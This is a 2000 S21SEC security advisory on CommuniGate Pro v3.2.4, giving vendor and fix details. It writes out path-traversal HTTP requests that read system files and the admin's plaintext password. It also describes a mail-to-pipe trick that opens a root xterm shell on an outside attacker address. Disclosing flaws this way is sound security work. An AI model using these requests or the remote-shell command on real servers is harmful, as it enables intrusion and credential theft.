############################################################### ID: S21SEC-003-en Title: Vulnerabilities in Stalker's CommuniGate Pro v3.2.4 Date: 03/04/2000 Status: Vendor contacted Scope: Remote command execution as superuser Platforms: Linux, probably others Author: llmora, fjserna Location: http://www.s21sec.com/en/avisos/s21sec-003-en.txt Release: Public ############################################################### S 2 1 S E C http://www.s21sec.com Vulnerabilities in Stalker's CommuniGate Pro v3.2.4 About CommuniGate Pro --------------------- CommuniGate Pro is a feature-full commercial mail server (http://www.stalker.com/CommuniGatePro/). It does SMTP message routing, provides POP, IMAP and HTTP access to mail, etc. The CommuniGate Pro mail server has a built-in web server that allows users to read and send e-mail through the web, as well as allowing the administrator to remotely manage the mail server settings. By default it opens port 8100/tcp for web users access to mail and port 8010/tcp for web management access. Vulnerability description ------------------------- 1. Reading any file in the mail server CommuniGate provides a useful mapping to access the Web User Guide, which maps the URL /Guide/ to a directory in the CommuniGate sub tree. The built-in web server suffers of the well-known "../.." web server problem. If we request a document from the administrative web server /Guide/ mapping, using the "../.." technique, we get to see the file contents: homer:~$ telnet ilf 8010 Escape character is '^]'. GET /Guide/../../../../../../../../../../../../../../../etc/motd HTTP/1.0 HTTP/1.0 200 OK [... the /etc/motd file content is shown] Connection closed by foreign host. homer:~$ As CommuniGate runs as root and it doesn't drop any privileges, we are able to access any file in the system, e.g. /etc/shadow, ... E.g., we can retrieve the postmaster/manager settings file, which includes the plaintext password to access the management website: homer:~$ telnet ilf 8010 Escape character is '^]'. GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster. macnt/account.settings HTTP/1.0 HTTP/1.0 200 OK Content-Length: 61 Date: Mon, 03 Apr 2000 09:17:35 GMT Content-Type: application/octet-stream Server: CommuniGatePro/3.2.4 Expires: Tue, 04 Apr 2000 09:17:35 GMT { ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;} Connection closed by foreign host. homer:~$ 2. Remote execution of arbitrary commands as root This is not a vulnerability in itself but a demonstration of what can be accomplished once an attacker has obtained the postmaster password. Looking up the features of CommuniGate, we find the PIPE feature. It allows people to send e-mail to a program in the mail server. It's disabled by default, but once we can access the mail server settings using the postmaster password, we can just enable it, make the application directory be /usr/X11R6/bin/, increase the max. process execution time, and send an e-mail to "xterm -display 172.16.2.4:0 -e /bin/sh"@pipe which will open a root xterm in our desktop... Affected versions and platforms ------------------------------- This bug has been tested on the Linux (non-redhat & redhat) v3.2.4 (the latest stable release) distribution found at www.stalker.com. It has not been tested with other platforms or previous versions, though we strongly believe the bug is platform independent, and can probably be found and reproduced in previous releases. Current beta versions (as from v3.3b2) don't suffer from this security problem. Fix information --------------- There is an upcoming stable release (v3.3) that will fix this problem, and currently the v3.3 betas (v3.3b2 or newer) are patched against this attack. Upgrades are available from the vendor website at http://www.stalker.com. Additional information ---------------------- This vulnerability was found and researched by: Lluis Mora llmora@s21sec.com Fermin J. Serna fjserna@s21sec.com You can find the latest version of this advisory at: http://www.s21sec.com/en/avisos/s21sec-003-en.txt And other S21SEC advisories at http://www.s21sec.com/en/avisos/